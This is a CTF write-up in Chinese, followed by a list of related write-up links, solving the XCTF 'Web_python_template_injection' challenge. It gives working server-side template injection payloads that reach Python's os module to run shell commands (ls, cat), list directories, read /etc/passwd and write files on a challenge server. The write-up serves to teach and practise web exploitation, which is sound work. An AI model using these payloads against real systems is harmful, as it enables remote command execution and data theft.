XCTF-Web-高手区-Web_python_template_injection
题目
解题
1、题目提示为python模板注入
猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式
2、测试一下
http://111.200.241.244:53038/{{1+1}}
经过该测试,说明存在SSTI
3、那么接下来可以使用相关payload进行验证
(1)payload1
查看所有模块
http://111.200.241.244:53038/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D
(2)payload2
查看当前目录,发现存在fl4g文件
http://111.200.241.244:53038/{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
或
http://111.200.241.244:53038/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
(3)payload3
读取fl4g文件
http://111.200.241.244:53038/{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}
或
http://111.200.241.244:53038/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}
(4)其它payload
读取文件
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
写入文件
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}
参考:https://www.cnblogs.com/hackxf/p/10480071.html
XCTF-Web-高手区-Web_python_template_injection相关推荐
- XCTF Web 高手区007: NewsCenter
题目: WP: 打开场景看到 search news的字样,只能输入进行操作 预测是一道SQL注入的题目 本题最直接的方法是sqlmap爆一下数据库 然而我对sqlmap的使用并不擅长 大家可以去看看 ...
- 20200109攻防世界WEB高手区题目一题多解全教程通关(13-18)
欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注 目录 013unserialize3 014upload1 015Web_python_tem ...
- XCTF MISC 高手区 2017_Dating_in_Singapore
2017_Dating_in_Singapore 题目给了一串数字和一个日历pdf,联想到这串数字对应日历上的日期,而且数字分为12段,正好对应12个月,所以在日历上将对应的日期连接起来可得flag ...
- XCTF MISC 高手区 Dift
Dift 附件是一张png图片,用foremost分离得到png和一个加密的rar文件,用ARCHPR暴力破解失败. 没有其它可用的信息,压缩包应该是和png图片有关 用010editor打开分离后的 ...
- 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...
- 攻防世界 web高手进阶区 10分题 weiphp
前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...
- 攻防世界 web高手进阶区 9分题 favorite_number
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...
- 攻防世界 web高手进阶区 8分题 Web_python_block_chain
前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...
- 攻防世界 web高手进阶区 9分题 bilibili
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是bilibili的writeup 解题过程 进来界面 这尼玛出题人是黑还是粉啊 笑死 看题目意思是买lv6 惯例源码+御剑 没发现什 ...
- 攻防世界 web高手进阶区 7分题Confusion1
前言 继续ctf的旅程 开始攻防世界web高手进阶区的7分题 本文是Confusion1的writeup 解题过程 进来的界面如下 (后来知道是php vs python的意思,也就是给提示跟pyth ...
最新文章
- UML中类之间的几种关系
- 0311-操作系统实验0
- asp.net 中ascx、asmx、ashx等文件类型说明
- python手机解释器_python3
- 自然语言处理实践Task6
- 代码规范之prettier+eslint实践
- SoC嵌入式软件架构设计II:否MMU的CPU虚拟内存管理的设计与实现方法
- HDU 6127 Hard challenge (极角排序)
- 局域网服务器共享文件夹设置,局域网服务器共享文件访问权限管理方法
- Opengl 渲染YUYV(YUV422)图像
- Type-C接口技术(一)
- android 拍照和选择相册图片剪切
- 计算机分屏解决方案,电脑一机多屏显示解决方案
- javascript小方法之数组去重、数字转成逗号分隔、html元素去标签
- 电脑“开始-运行”的常用命令及用法!很有用!
- IIC和SPI的异同
- 一台win10pc无法连接win7共享打印机
- 手机存储数据恢复软件哪个好用?试了10款,我只认准这一款!
- 鸵鸟腿“半兽人”已学会跟踪避障,可自主移动到安全距离
- osgearth仿真平台(1)